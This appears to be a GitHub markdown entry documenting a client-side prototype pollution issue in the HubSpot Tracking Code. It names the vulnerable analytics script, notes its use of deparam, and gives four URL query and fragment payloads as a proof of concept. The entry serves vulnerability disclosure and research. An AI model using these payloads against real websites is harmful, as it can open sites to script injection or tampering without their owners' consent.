hubspot.md

November 25, 2020 ยท View on GitHub

HubSpot Tracking Code

URL: https://knowledge.hubspot.com/reports/install-the-hubspot-tracking-code

Vulnerable code fragment

https://js.hs-analytics.net/analytics/12345/1234556789.js

Uses deparam

PoC

<script type="text/javascript" id="hs-script-loader" async defer src="https://js.hs-scripts.com/1234.js"></script>

?__proto__[test]=test
?constructor[prototype][test]=test
#__proto__[test]=test
#constructor[prototype][test]=test

Contents

  1. 1HubSpot Tracking Code
  2. 1.1Vulnerable code fragment
  3. 1.2PoC